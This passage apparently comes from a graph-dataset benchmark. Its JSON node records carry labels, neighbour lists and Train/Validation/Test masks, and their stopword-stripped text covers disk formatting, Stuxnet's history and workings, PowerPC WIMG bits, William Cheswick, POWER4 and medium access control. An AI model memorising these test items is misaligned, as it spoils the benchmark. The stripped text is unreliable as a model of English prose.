written read back drive correctly term however used refer portion process every sector drive written usually writing specific value every addressable location disk traditionally physical sectors initialized fill value codice_1 per int 1eh disk parameter table dpt format ibm compatible machines value also used atari portfolio 8-inch cp/m floppies typically came pre-formatted value codice_2 way digital research value also used atari st amstrad formatted floppies amstrad otherwise used codice_3 fill value modern formatters wipe hard disks value codice_4 instead sometimes also called zero-filling whereas value codice_5 used flash disks reduce wear latter value typically also default value used rom disks reformatted advanced formatting tools allow configuring fill value one popular method performing zero-fill operation hard disk writing zero-value bytes drive using unix dd utility /dev/zero stream input file drive specific partition output file command may take many hours complete erase files file systems another method scsi disks may use sg_format command issue low-level scsi format unit command zero-filling drive necessarily secure method erasing sensitive data preparing drive use encrypted filesystem zero-filling voids plausible deniability process partitioning process writing information blocks storage device medium allows access operating system operating systems allow device medium appear multiple devices i.e partitioned multiple devices ms-dos microsoft windows unix-based operating systems bsd linux mac os x normally done partition editor fdisk gnu parted disk utility operating systems support multiple partitions current ibm mainframe oss derived os/360 dos/360 z/os z/vse done init command ickdsf utility oss support single partition per device called volume ickdsf functions include creating volume label writing record 0 every track floppy disks partitioned however depending upon os may require volume information order accessed os partition editors ickdsf today handle low level functions hdds optical disc drives writing timing marks reinitialize modern disk degaussed otherwise lost factory formatting high-level formatting process setting empty file system disk partition logical volume pcs installing boot sector fast operation sometimes referred quick formatting entire logical drive partition may optionally scanned defects may take considerable time case floppy disks high- low-level formatting customarily performed one pass disk formatting software 8-inch floppies typically came low-level formatted filled format filler value codice_2 since 1990s 5.25-inch 3.5-inch floppies shipped pre-formatted factory dos fat12 floppies current ibm mainframe operating systems derived os/360 dos/360 may done part allocating file utility specific file system older access methods fly new data written host protected area sometimes referred hidden protected area area hard drive high level formatted area normally visible operating system os reformatting high-level formatting performed functioning disk drive free medium contents reformatting unique operating system actually done existing data varies os important aspect process frees disk space use data actually erase everything requires overwriting block data medium something done many high-level formatting utilities reformatting often carries implication operating system software reinstalled format complete rather fixing installation suffering malfunction security compromise may necessary simply reformat everything start scratch various colloquialisms exist process wipe reload nuke pave reimage etc format command ms-dos pc dos os/2 microsoft windows disk formatting performed codice_7 command codice_7 program usually asks confirmation beforehand prevent accidental removal data versions dos undocumented codice_9 option used usual confirmation skipped format begins right away wm/formatc macro virus uses command format drive c soon document opened unconditional format also codice_10 parameter performs unconditional format circumstances overwrites entire partition preventing recovery data software note however codice_10 switch works reliably floppy diskettes see image right technically unless codice_12 used floppies always low level formatted addition high-level formatted certain circumstances hard drive partitions however codice_10 switch merely prevents creation codice_14 information partition formatted otherwise leaving partition contents entirely intact still disk marked deleted cases user data remain ripe recovery specialist tools encase disk editors reliance upon codice_10 secure overwriting hard drive partitions therefore inadvisable purpose-built tools dban considered instead overwriting windows vista upwards non-quick format overwrite goes case windows xp os/2 os/2 use codice_16 parameter specifies long format format overwrite entire partition logical drive enhances ability chkdsk recover files high-level formatting disks systems traditionally done using codice_17 command linux potentially systems well codice_17 typically wrapper around filesystem-specific commands name codice_19 fsname name filesystem format disk filesystems supported certain implementations codice_17 manipulation tools example ntfsprogs provides format utility ntfs filesystem unix unix-like operating systems higher-level formatting tools usually purpose making disk formatting easier and/or allowing user partition disk tool examples include gnu parted various gui frontends gparted kde partition manager disk utility application mac os x file deletion operating system data disk fully erased every high-level format instead area disk containing data merely marked available retains old data overwritten disk formatted different file system one previously existed partition data may overwritten would n't file system used however file systems e.g. ntfs fat file indexes mfts ntfs inodes ext2/3 etc may written exact locations partition size increased even fat file systems overwrite data beginning new partition perspective preventing recovery sensitive data recovery tools data must either completely overwritten every sector random data format format program must perform overwriting dos codice_21 command floppy diskettes filling every data sector format filler byte value typically codice_1 however applications tools especially used forensic information technology recover data conventionally erased order avoid recovery sensitive data governmental organization big companies use information destruction methods like gutmann method average users also special applications perform complete data destruction overwriting previous information although applications perform multiple writes assure data erasure single write old data generally needed modern hard disk drives ata secure erase performed disk utilities quickly thoroughly wipe drives degaussing another option however may render drive unusable",
    "neighbors": [
      1408,
      2432,
      10508,
      6797,
      7053,
      2193,
      6289,
      3859,
      9343,
      1440,
      9762,
      8485,
      8235,
      5293,
      7342,
      7983,
      11182,
      9907,
      823,
      4408,
      4409,
      701,
      7106,
      1475,
      10564,
      10570,
      7244,
      9166,
      975,
      4815,
      11598,
      1235,
      4563,
      4441,
      2395,
      6494,
      11368,
      8951,
      2545,
      8049,
      3315,
      8306,
      6263,
      2168,
      3323,
      2687
    ],
    "mask": "Test"
  },
  {
    "node_id": 3842,
    "label": 2,
    "text": "Nexus_driver:nexus driver term nexus driver refers bus device driver interfaces leaf drivers specific i/o bus provides low-level integration i/o bus",
    "neighbors": [
      3803
    ],
    "mask": "Test"
  },
  {
    "node_id": 3843,
    "label": 4,
    "text": "Stuxnet:stuxnet stuxnet malicious computer worm first uncovered 2010 thought development since least 2005 stuxnet targets scada systems believed responsible causing substantial damage iran nuclear program although neither country openly admitted responsibility worm believed jointly built american/israeli cyberweapon stuxnet specifically targets programmable logic controllers plcs allow automation electromechanical processes used control machinery industrial processes including centrifuges separating nuclear material exploiting four zero-day flaws stuxnet functions targeting machines using microsoft windows operating system networks seeking siemens step7 software stuxnet reportedly compromised iranian plcs collecting information industrial systems causing fast-spinning centrifuges tear apart stuxnet design architecture domain-specific could tailored platform attacking modern supervisory control data acquisition scada plc systems e.g. factory assembly lines power plants majority reside europe japan us stuxnet reportedly ruined almost one fifth iran nuclear centrifuges targeting industrial control systems worm infected 200,000 computers caused 1,000 machines physically degrade stuxnet three modules worm executes routines related main payload attack link file automatically executes propagated copies worm rootkit component responsible hiding malicious files processes preventing detection presence stuxnet typically introduced target environment via infected usb flash drive thereby crossing air gap worm propagates across network scanning siemens step7 software computers controlling plc absence either criterion stuxnet becomes dormant inside computer conditions fulfilled stuxnet introduces infected rootkit onto plc step7 software modifying code giving unexpected commands plc returning loop normal operations system values feedback users 2015 kaspersky lab noted equation group used two zero-day attacks prior use stuxnet commented similar type usage exploits together different computer worms around time indicates equation group stuxnet developers either working closely together stuxnet discovered sergey ulasen initially spread via microsoft windows targeted siemens industrial control systems first time hackers targeted industrial systems first publicly known intentional act cyberwarfare implemented first discovered malware spies subverts industrial systems first include programmable logic controller plc rootkit worm initially spreads indiscriminately includes highly specialized malware payload designed target siemens supervisory control data acquisition scada systems configured control monitor specific industrial processes stuxnet infects plcs subverting step-7 software application used reprogram devices different variants stuxnet targeted five iranian organizations probable target widely suspected uranium enrichment infrastructure iran symantec noted august 2010 60 infected computers worldwide iran siemens stated worm caused damage customers iran nuclear program uses embargoed siemens equipment procured secretly damaged stuxnet kaspersky lab concluded sophisticated attack could conducted nation-state support f-secure chief researcher mikko hyppönen asked possible nation-state support involved agreed would look like yes may 2011 pbs program need know cited statement gary samore white house coordinator arms control weapons mass destruction said 're glad iranians trouble centrifuge machine – us allies – everything make sure complicate matters offering winking acknowledgement us involvement stuxnet according daily telegraph showreel played retirement party head israel defense forces idf gabi ashkenazi included references stuxnet one operational successes idf chief staff 1 june 2012 article new york times said stuxnet part us israeli intelligence operation called operation olympic games started president george w. bush expanded president barack obama 24 july 2012 article chris matyszczyk cnet reported atomic energy organization iran e-mailed f-secure chief research officer mikko hyppönen report new instance malware 25 december 2012 iranian semi-official news agency announced cyberattack stuxnet time industries southern area country virus targeted power plant industries hormozgan province recent months according expert eugene kaspersky worm also infected nuclear power plant russia kaspersky noted however since power plant connected public internet system remain safe worm first identified security company virusblokada mid-june 2010 journalist brian krebs blog posting 15 july 2010 first widely read report worm original name given virusblokada rootkit.tmphider symantec however called w32.temphid later changing w32.stuxnet current name derived combination keywords software .stub mrxnet.sys reason discovery time attributed virus accidentally spreading beyond intended target natanz plant due programming error introduced update led worm spreading engineer computer connected centrifuges spreading engineer returned home connected computer internet kaspersky lab experts first estimated stuxnet started spreading around march april 2010 first variant worm appeared june 2009 15 july 2010 day worm existence became widely known distributed denial-of-service attack made servers two leading mailing lists industrial-systems security attack unknown source likely related stuxnet disabled one lists thereby interrupted important source information power plants factories hand researchers symantec uncovered version stuxnet computer virus used attack iran nuclear program november 2007 developed early 2005 iran still setting uranium enrichment facility second variant substantial improvements appeared march 2010 apparently authors believed stuxnet spreading fast enough third minor improvements appeared april 2010 worm contains component build time-stamp 3 february 2010 united kingdom 25 november 2010 sky news reported received information anonymous source unidentified security organization stuxnet variation worm traded black market study spread stuxnet symantec showed main affected countries early days infection iran indonesia india iran reported beefed cyberwar capabilities following stuxnet attack suspected retaliatory attacks us banks unlike malware stuxnet little harm computers networks meet specific configuration requirements attackers took great care make sure designated targets hit ... marksman job worm promiscuous makes inert siemens software found infected computers contains safeguards prevent infected computer spreading worm three others erase 24 june 2012 targets stuxnet contains among things code man-in-the-middle attack fakes industrial process control sensor signals infected system shut due detected abnormal behavior complexity unusual malware worm consists layered attack three different systems stuxnet attacked windows systems using unprecedented four zero-day attacks plus cplink vulnerability vulnerability used conficker worm initially spread using infected removable drives usb flash drives contain windows shortcut files initiate executable code worm uses exploits techniques peer-to-peer rpc infect update computers inside private networks directly connected internet number zero-day exploits used unusual highly valued malware creators typically make use thus simultaneously make visible four different zero-day exploits worm amongst exploits remote code execution computer printer sharing enabled lnk/pif vulnerability file execution accomplished icon viewed windows explorer negating need user interaction stuxnet unusually large half megabyte size written several different programming languages including c c++ also irregular malware windows component malware promiscuous spreads relatively quickly indiscriminately malware user-mode kernel-mode rootkit capability windows device drivers digitally signed private keys two certificates stolen separate well-known companies jmicron realtek located hsinchu science park taiwan driver signing helped install kernel-mode rootkit drivers successfully without users notified therefore remained undetected relatively long period time compromised certificates revoked verisign two websites denmark malaysia configured command control servers malware allowing updated industrial espionage conducted uploading information domain names subsequently redirected dns service provider dynadot part global effort disable malware according researcher ralph langner installed windows system stuxnet infects project files belonging siemens wincc/pcs 7 scada control software step 7 subverts key communication library wincc called codice_1 intercepts communications wincc software running windows target siemens plc devices software able configure program two connected via data cable way malware able install plc devices unnoticed subsequently mask presence wincc control software attempts read infected block memory plc system malware furthermore used zero-day exploit wincc/scada database software form hard-coded database password entirety stuxnet code yet disclosed payload targets scada configurations meet criteria programmed identify stuxnet requires specific slave variable-frequency drives frequency converter drives attached targeted siemens s7-300 system associated modules attacks plc systems variable-frequency drives two specific vendors vacon based finland fararo paya based iran furthermore monitors frequency attached motors attacks systems spin 807 hz 1,210 hz industrial applications motors parameters diverse may include pumps gas centrifuges stuxnet installs malware memory block db890 plc monitors profibus messaging bus system certain criteria met periodically modifies frequency 1,410 hz 2 hz 1,064 hz thus affects operation connected motors changing rotational speed also installs rootkit – first documented case platform – hides malware system masks changes rotational speed monitoring systems siemens released detection removal tool stuxnet siemens recommends contacting customer support infection detected advises installing microsoft updates security vulnerabilities prohibiting use third-party usb flash drives siemens also advises immediately upgrading password access codes worm ability reprogram external plcs may complicate removal procedure symantec liam o'murchu warns fixing windows systems may completely solve infection thorough audit plcs may necessary despite speculation incorrect removal worm could cause damage siemens reports first four months since discovery malware successfully removed systems 22 customers without adverse impact prevention control system security incidents viral infections like stuxnet topic addressed public private sector us department homeland security national cyber security division ncsd operates control system security program cssp program operates specialized computer emergency response team called industrial control systems cyber emergency response team ics-cert conducts biannual conference provides training publishes recommended practices provides self-assessment tool part department homeland security plan improve american computer security 2008 idaho national laboratory inl worked siemens identify security holes company widely used process control system 7 pcs 7 software step 7 july 2008 inl siemens publicly announced flaws control system chicago conference stuxnet exploited holes 2009 several industry organizations professional societies published standards best practice guidelines providing direction guidance control system end-users establish control system security management program basic premise documents share prevention requires multi-layered approach often referred defense-in-depth layers include policies procedures awareness training network segmentation access control measures physical security measures system hardening e.g. patch management system monitoring anti-virus intrusion prevention system ips standards best practices also recommend starting risk analysis control system security assessment experts believe stuxnet required largest costliest development effort malware history developing many capabilities would required team highly capable programmers in-depth knowledge industrial processes interest attacking industrial infrastructure eric byres years experience maintaining troubleshooting siemens systems told wired writing code would taken many man-months man-years symantec estimates group developing stuxnet would consisted five thirty people would taken six months prepare guardian bbc new york times claimed unnamed experts studying stuxnet believe complexity code indicates nation-state would capabilities produce self-destruct safeguards within code implied western government responsible least responsible development however software security expert bruce schneier initially condemned 2010 news coverage stuxnet hype stating almost entirely based speculation subsequent research schneier stated 2012 conclusively link stuxnet centrifuge structure natanz nuclear enrichment lab iran ralph langner researcher identified stuxnet infected plcs first speculated publicly september 2010 malware israeli origin targeted iranian nuclear facilities however langner recently ted talk recorded february 2011 stated opinion mossad involved leading force israel leading force behind stuxnet cyber superpower – one united states kevin hogan senior director security response symantec reported majority infected systems iran 60 led speculation may deliberately targeting high-value infrastructure iran including either bushehr nuclear power plant natanz nuclear facility langner called malware one-shot weapon said intended target probably hit although admitted speculation another german researcher spokesman german-based chaos computer club frank rieger first speculate natanz target according israeli newspaper haaretz september 2010 experts iran computer security specialists increasingly convinced stuxnet meant sabotage uranium enrichment facility natanz – centrifuge operational capacity dropped past year 30 percent 23 november 2010 announced uranium enrichment natanz ceased several times series major technical problems serious nuclear accident supposedly shutdown centrifuges occurred site first half 2009 speculated forced head iran atomic energy organization gholam reza aghazadeh resign statistics published federation american scientists fas show number enrichment centrifuges operational iran mysteriously declined 4,700 3,900 beginning around time nuclear incident wikileaks mentioned would occurred institute science international security isis suggests report published december 2010 stuxnet reasonable explanation apparent damage natanz may destroyed 1,000 centrifuges 10 percent sometime november 2009 late january 2010 authors conclude isis report notes iranian authorities attempted conceal breakdown installing new centrifuges large scale worm worked first causing infected iranian ir-1 centrifuge increase normal operating speed 1,064 hertz 1,410 hertz 15 minutes returning normal frequency twenty-seven days later worm went back action slowing infected centrifuges hundred hertz full 50 minutes stresses excessive slower speeds caused aluminium centrifugal tubes expand often forcing parts centrifuges sufficient contact destroy machine according washington post iaea cameras installed natanz facility recorded sudden dismantling removal approximately 900–1,000 centrifuges time stuxnet worm reportedly active plant iranian technicians however able quickly replace centrifuges report concluded uranium enrichment likely briefly disrupted 15 february 2011 institute science international security released report concluding associated press reported semi-official iranian students news agency released statement 24 september 2010 stating experts atomic energy organization iran met previous week discuss stuxnet could removed systems according analysts david albright western intelligence agencies attempting sabotage iranian nuclear program time head bushehr nuclear power plant told reuters personal computers staff plant infected stuxnet state-run newspaper iran daily quoted reza taghipour iran telecommunications minister saying caused serious damage government systems director information technology council iranian ministry industries mines mahmud liaii said electronic war launched iran ... computer worm designed transfer data production lines industrial plants locations outside iran response infection iran assembled team combat 30,000 ip addresses affected iran official said infection fast spreading iran problem compounded ability stuxnet mutate iran set systems clean infections advised using siemens scada antivirus since suspected antivirus actually embedded codes update stuxnet instead eradicating according hamid alipour deputy head iran government information technology company attack still ongoing new versions virus spreading reported company begun cleanup process iran sensitive centres organizations anticipated could root virus within one two months virus stable since started cleanup process three new versions spreading told islamic republic news agency 27 september 2010 29 november 2010 iranian president mahmoud ahmadinejad stated first time computer virus caused problems controller handling centrifuges natanz facilities according reuters told reporters news conference tehran succeeded creating problems limited number centrifuges software installed electronic parts day two iranian nuclear scientists targeted separate nearly simultaneous car bomb attacks near shahid beheshti university tehran majid shahriari quantum physicist killed fereydoon abbasi high-ranking official ministry defense seriously wounded wired speculated assassinations could indicate whoever behind stuxnet felt sufficient stop nuclear program wired article suggested iranian government could behind assassinations january 2010 another iranian nuclear scientist physics professor tehran university killed similar bomb explosion 11 january 2012 director natanz nuclear enrichment facility mostafa ahmadi roshan killed attack quite similar one killed shahriari analysis fas demonstrates iran enrichment capacity grew 2010 study indicated iran centrifuges appeared performing 60 better previous year would significantly reduce tehran time produce bomb-grade uranium fas report reviewed official iaea affirmed study european us officials along private experts told reuters iranian engineers successful neutralizing purging stuxnet country nuclear machinery given growth iranian enrichment capability 2010 country may intentionally put misinformation cause stuxnet creators believe worm successful disabling iranian nuclear program actually israel unit 8200 speculated country behind stuxnet many media reports experts richard a. falkenrath former senior director policy plans within us office homeland security yossi melman covers intelligence israeli daily newspaper haaretz writing book israeli intelligence also suspected israel involved noting meir dagan former 2011 head national intelligence agency mossad term extended 2009 said involved important projects additionally israel expects iran nuclear weapon 2014 2015 – least three years later earlier estimates – without need israeli military attack iranian nuclear facilities seem know something time originally thought added israel publicly commented stuxnet attack confirmed cyberwarfare among pillars defense doctrine military intelligence unit set pursue defensive offensive options questioned whether israel behind virus fall 2010 israeli officials broke wide smiles fueling speculation government israel involved genesis american presidential advisor gary samore also smiled stuxnet mentioned although american officials indicated virus originated abroad according telegraph israeli newspaper haaretz reported video celebrating operational successes gabi ashkenazi retiring idf chief staff shown retirement party included references stuxnet thus strengthening claims israel security forces responsible 2009 year stuxnet discovered scott borg united states cyber-consequences unit us-ccu suggested israel might prefer mount cyber-attack rather military strike iran nuclear facilities late 2010 borg stated israel certainly ability create stuxnet little downside attack would virtually impossible prove tool like stuxnet israel obvious weapon choice iran uses p-1 centrifuges natanz design a. q. khan stole 1976 took pakistan black market nuclear-proliferation network sold p-1s among customers iran experts believe israel also somehow acquired p-1s tested stuxnet centrifuges installed dimona facility part nuclear program equipment may united states received p-1s libya former nuclear program also referred several clues code concealed reference word myrtus believed refer myrtle tree hadassah hebrew hadassah birth name former jewish queen persia queen esther however may myrtus reference simply misinterpreted reference scada components known rtus remote terminal units reference actually rtus –a management feature scada also number 19790509 appears code might refer date 1979 may 09 day habib elghanian persian jew executed tehran another date appears code 24 september 2007 day iran president mahmoud ahmadinejad spoke columbia university made comments questioning validity holocaust data conclusive since noted symantec ... attackers would natural desire implicate another party also testimony involvement united states collaboration israel one report stating vanishingly little doubt played role creating worm reported united states one secret programs initiated bush administration accelerated obama administration sought destroy iran nuclear program novel methods undermining iranian computer systems diplomatic cable obtained wikileaks showed united states advised target iran nuclear capabilities 'covert sabotage new york times article early january 2009 credited unspecified program preventing israeli military attack iran efforts focused ways destabilize centrifuges wired article claimed stuxnet believed created united states fact john bumgarner former intelligence officer member united states cyber-consequences unit us-ccu published article prior stuxnet discovered deciphered outlined strategic cyber strike centrifuges suggests cyber attacks permissible nation states operating uranium enrichment programs violate international treaties gives credibility claims bumgarner pointed centrifuges used process fuel nuclear weapons key target cybertage operations made destroy manipulating rotational speeds march 2012 interview 60 minutes retired us air force general michael hayden – served director central intelligence agency national security agency – denying knowledge created stuxnet said believed good idea carried downside legitimized use sophisticated cyber weapons designed cause physical damage hayden said take look ... maybe even attempt turn purposes report sean mcgurk former cybersecurity official department homeland security noted stuxnet source code could downloaded online modified directed new target systems speaking stuxnet creators said opened box demonstrated capability ... something put back april 2011 iranian government official gholam reza jalali stated investigation concluded united states israel behind stuxnet attack frank rieger stated three european countries intelligence agencies agreed stuxnet joint united states-israel effort code windows injector plc payload differ style likely implying collaboration experts believe us-israel cooperation unlikely level trust two countries ’ intelligence military establishments high wired magazine article us general keith b. alexander stated cyber warriors already launched first attack cyber weapon came known stuxnet created built nsa partnership cia israeli intelligence mid-2000s china jordan france possibilities siemens may also participated langner speculated infection may spread usb drives belonging russian contractors since iranian targets accessible via internet sandro gaycken free university berlin argued attack iran ruse distract stuxnet real purpose according broad dissemination 100,000 industrial plants worldwide suggests field test cyber weapon different security cultures testing preparedness resilience reactions highly valuable information cyberwar unit united kingdom denied involvement worm creation stratfor documents released wikileaks suggest international security firm 'stratfor believe israel behind stuxnet – ca n't assume stuxnet capable blast well july 2013 edward snowden claimed stuxnet cooperatively developed united states israel according report reuters nsa also tried sabotage north korea nuclear program using version stuxnet operation reportedly launched tandem attack targeted iranian centrifuges 2009–10 north korean nuclear program shares many similarities iranian developed technology transferred pakistani nuclear scientist a.q khan effort failed however north korea extreme secrecy isolation made impossible introduce stuxnet nuclear facility gholamreza jalali iran chief national passive defence organisation npdo claims country fended stuxnet-like attack targeting country telecom infrastructure iran telecommunications minister mohammad-javad azari jahromi since accused israel orchestrating attack iran plans sue israel international court justice icj also willing launch retaliation attack latter n't mend ways november 2013 article foreign policy magazine claims existence earlier much sophisticated attack centrifuge complex natanz focused increasing centrifuge failure rate long time period stealthily inducing uranium hexafluoride gas overpressure incidents malware capable spreading physically installed probably previously contaminated field equipment used contractors working siemens control systems within complex clear whether attack attempt successful followed different simpler conventional attack indicative 1 september 2011 new worm found thought related stuxnet laboratory cryptography system security crysys budapest university technology economics analyzed malware naming threat duqu symantec based report continued analysis threat calling nearly identical stuxnet completely different purpose published detailed technical paper main component used duqu designed capture information keystrokes system information exfiltrated data may used enable future stuxnet-like attack 28 december 2011 kaspersky lab director global research analysis spoke reuters recent research results showing platform stuxnet duqu originated 2007 referred tilded due ~d beginning file names also uncovered research possibility three variants based tilded platform may 2012 new malware flame found thought related stuxnet researchers named program flame name one modules analysing code flame kaspersky lab said strong relationship flame stuxnet early version stuxnet contained code propagate infections via usb drives nearly identical flame module exploits vulnerability december 2017 reported safety systems unidentified power station believed saudi arabia compromised triconex industrial safety technology made schneider electric se targeted believed state sponsored attack computer security company symantec claimed malware known triton exploited vulnerability computers running microsoft windows operating system since 2010 extensive international media coverage stuxnet aftermath early commentary economist pointed stuxnet new kind cyber-attack 8 july 2011 wired published article detailing network security experts able decipher origins stuxnet piece kim zetter claimed stuxnet cost–benefit ratio still question later commentators tended focus strategic significance stuxnet cyber weapon following wired piece holger stark called stuxnet first digital weapon geopolitical importance could change way wars fought meanwhile eddie walsh referred stuxnet world newest high-end asymmetric threat ultimately claim extensive media coverage afforded stuxnet served advertisement vulnerabilities used various cybercriminal groups may case media coverage also increased awareness cyber security threats alex gibney 2016 documentary zero days covers phenomenon around stuxnet 2016 revealed general james cartwright former head u.s. strategic command leaked information related stuxnet later pleaded guilty lying fbi agents pursuing investigation leak 17 january 2017 granted full pardon case president obama thereby expunging conviction",
    "neighbors": [
      1024,
      513,
      5636,
      9744,
      9233,
      3092,
      4117,
      8726,
      535,
      6167,
      9246,
      5665,
      9761,
      4644,
      4133,
      6707,
      575,
      9791,
      10309,
      1608,
      3657,
      8779,
      7759,
      4689,
      8797,
      4703,
      8288,
      3170,
      8292,
      8805,
      10348,
      7798,
      10875,
      3711,
      8320,
      7809,
      5764,
      2187,
      6797,
      4240,
      11409,
      1688,
      2717,
      9375,
      161,
      8865,
      675,
      9904,
      9395,
      8886,
      3789,
      7887,
      4304,
      7893,
      6360,
      4314,
      9435,
      4830,
      3807,
      9439,
      9441,
      5349,
      1254,
      3305,
      10477,
      9460,
      7418,
      4863,
      2815,
      10502,
      7440,
      10003,
      9214,
      10232,
      3867,
      1315,
      1827,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      11584,
      9537,
      1861,
      4945,
      6484,
      857,
      1882,
      7515,
      4956,
      3423,
      9569,
      5986,
      3944,
      3956,
      9082,
      8574,
      10110,
      10637,
      11662,
      11152,
      10132,
      1440,
      5024,
      5028,
      3495,
      11175,
      9129,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      5563,
      8640,
      9664,
      3525,
      8133,
      10190,
      4054,
      7639,
      8664,
      9688,
      1504,
      9186,
      10210,
      2542,
      4081,
      1528,
      2041,
      507,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3844,
    "label": 3,
    "text": "WIMG_(CPU):wimg cpu wimg acronym describes memory/cache attributes powerpc/power isa letter wimg represents one bit access attribute specifically write-through access w cache-inhibited access memory coherence guarded g set 1 indicates write-through access set 0 indicates access address non-write set 1 indicates cache-inhibited access set 0 indicates access address cacheable external caches look-aside directory protocols use bit determine actions value bit must accesses processors given address carried ax field.1 however i/o peripheral may access bit set 1 address accessed processors bit set 0 aliasing bit considered error combination w=i=1 supported set 1 requires memory coherence must enforced regardless values qualifiers specifically cache hierarchies must snoop transaction even bit set bit set presentation transaction snooper snooper must ignore transaction however originator transaction may ignore even 0 cache-inhibited guarded writes g 1 issued given processor must performed system order issuance processor regardless coherency qualifier regardless addresses carried transactions",
    "neighbors": [
      7299,
      10501,
      1158,
      7302,
      7305,
      3467,
      1548,
      6415,
      2073,
      7065,
      8102,
      5297,
      11314,
      11447,
      8761,
      6715,
      1983,
      10945,
      3017,
      8530,
      3540,
      3932,
      3936,
      8931,
      7269,
      10985,
      9964,
      8048,
      3185,
      10224,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 3845,
    "label": 4,
    "text": "William_Cheswick:william cheswick william r. bill cheswick also known ches computer security networking researcher cheswick graduated lawrenceville school 1970 received b.s fundamental science 1975 lehigh university lehigh working doug price steve lidie cheswick co-authored senator line-oriented text editor cheswick early career included contracting bethlehem pa 1975 1977 programmer american newspaper publishers association research institute easton pa 1976 1977 systems programmer computer sciences corporation warminster pa 1977 1978 following cheswick joined systems computer technology corporation served systems programmer consultant 1978 1987 much cheswick early career related expertise control data corporation cdc mainframes operating systems scope nos related compass assembly language cheswick initially worked cdc systems student lehigh university cheswick joined bell labs 1987 shortly thereafter steven m. bellovin created one world first network firewalls resulting research papers lead publication seminal book firewalls internet security one first describe architecture firewall detail cheswick bellovin also created one world first honeypots course detecting trapping attempted intruder network 1998 cheswick still bell labs controlled lucent started internet mapping project assisted hal burch research allowed large scale mapping internet first time using tracerouting techniques learn connectivity graph global networks work ultimately led founding 2000 spinoff company lumeta cheswick co-founder held title chief scientist joined shannon lab 2007 remained 2012 cheswick currently lives new jersey wife two children home farmhouse flemington electronic smart house equipped voice synthesizer reports relevant information mailbox status evening stock news cheswick developed interactive exhibits science museums including liberty science center new jersey cheswick also enjoys model rocketry lock picking electronic physical interested developing better passwords discussed article rethinking passwords communications acm 56.2 2013 cheswick also seeking permission filmmakers publish visualizations movies",
    "neighbors": [
      3937,
      8998,
      2118,
      9256,
      331,
      11249,
      9684
    ],
    "mask": "None"
  },
  {
    "node_id": 3846,
    "label": 3,
    "text": "POWER4:power4 power4 microprocessor developed international business machines ibm implemented 64-bit powerpc powerpc instruction set architectures released 2001 power4 succeeded power3 rs64 microprocessors used rs/6000 as/400 computers ending separate development powerpc microprocessors as/400 power4 multicore microprocessor two cores single die first non-embedded microprocessor power4 chip first commercially available multiprocessor chip original power4 clock speed 1.1 1.3 ghz enhanced version power4+ reached clock speed 1.9 ghz powerpc 970 derivative power4 power4 unified l2 cache divided three equal parts independent l2 controller feed 32 bytes data per cycle core interface unit ciu connects l2 controller either data cache instruction cache either two processors non-cacheable nc unit responsible handling instruction serializing functions performing noncacheable operations storage topology l3 cache controller actual memory off-chip gx bus controller controls i/o device communications two 4-byte wide gx buses one incoming outgoing fabric controller master controller network buses controlling communications l1/l2 controllers communications power4 chips 4-way 8-way 16-way 32-way power4 mcm trace-and-debug used first failure data capture provided also built self test function bist performance monitoring unit pmu power-on reset por supported power4 implements superscalar microarchitecture high-frequency speculative out-of-order execution using eight independent execution units two floating-point units fp1-2 two load-store units ld1-2 two fixed-point units fx1-2 branch unit br conditional-register unit cr execution units complete eight operations per clock including br cr units pipeline stages power4 also came configuration using multi-chip module mcm containing four power4 dies single package 128 mb shared l3 ecc cache per mcm power4+ released 2003 improved version power4 ran 1.9 ghz contained 184 million transistors measured 267 mm fabricated 0.13 µm soi cmos process eight layers copper interconnect",
    "neighbors": [
      6914,
      4868,
      10501,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      4881,
      7065,
      1563,
      1309,
      6815,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      10675,
      6072,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      336,
      8530,
      3540,
      342,
      9302,
      3547,
      11613,
      6878,
      1635,
      8931,
      869,
      10214,
      10985,
      5358,
      8815,
      1776,
      3185,
      10734,
      4211,
      5235,
      630,
      8058,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3847,
    "label": 5,
    "text": "Medium_access_control:medium access control ieee 802 lan/man standards medium access control mac sublayer layer controls hardware responsible interaction wired optical wireless transmission medium mac sublayer logical link control llc sublayer together make data link layer within data link layer llc provides flow control multiplexing logical link i.e ethertype 802.1q vlan tag etc mac provides flow control multiplexing transmission medium two sublayers together correspond layer 2 osi model compatibility reasons llc optional implementations ieee 802.3 frames raw compulsory implementations ieee 802 physical layer standards within hierarchy osi model ieee 802 standards mac sublayer provides control abstraction physical layer complexities physical link control invisible llc upper layers network stack thus llc sublayer higher layers may used mac turn medium access control block formally connected phy via media-independent interface although mac block today typically integrated phy within device package historically mac could used phy independent transmission medium sending data another device network mac sublayer encapsulates higher-level frames frames appropriate transmission medium i.e mac adds syncword preamble also padding necessary adds frame check sequence identify transmission errors forwards data physical layer soon appropriate channel access method permits topologies collision domain bus ring mesh point-to-multipoint topologies controlling data sent wait necessary avoid collisions additionally mac also responsible compensating collisions initiating retransmission jam signal detected receiving data physical layer mac block ensures data integrity verifying sender frame check sequences strips sender preamble padding passing data higher layers according ieee std 802-2001 section 6.2.3 mac sublayer primary functions performed mac layer case ethernet according 802.3-2002 section 4.1.4 functions required mac local network addresses used ieee 802 networks fddi networks called media access control addresses based addressing scheme used early ethernet implementations mac address intended unique serial number mac addresses typically assigned network interface hardware time manufacture significant part address identifies manufacturer assigns remainder address thus provide potentially unique address makes possible frames delivered network link interconnects hosts combination repeaters hubs bridges switches network layer routers thus example ip packet reaches destination sub network destination ip address layer 3 network layer concept resolved address resolution protocol ipv4 neighbor discovery protocol ipv6 mac address layer 2 concept destination host examples physical networks ethernet networks wi-fi networks ieee 802 networks use ieee 802 48-bit mac addresses mac layer required full-duplex point-to-point communication address fields included point-to-point protocols compatibility reasons channel access control mechanisms provided mac layer also known multiple access protocol makes possible several stations connected physical medium share examples shared physical media bus networks ring networks hub networks wireless networks half-duplex point-to-point links multiple access protocol may detect avoid data packet collisions packet mode contention based channel access method used reserve resources establish logical channel circuit-switched channelization-based channel access method used channel access control mechanism relies physical layer multiplex scheme widespread multiple access protocol contention based csma/cd protocol used ethernet networks mechanism utilized within network collision domain example ethernet bus network hub-based star topology network ethernet 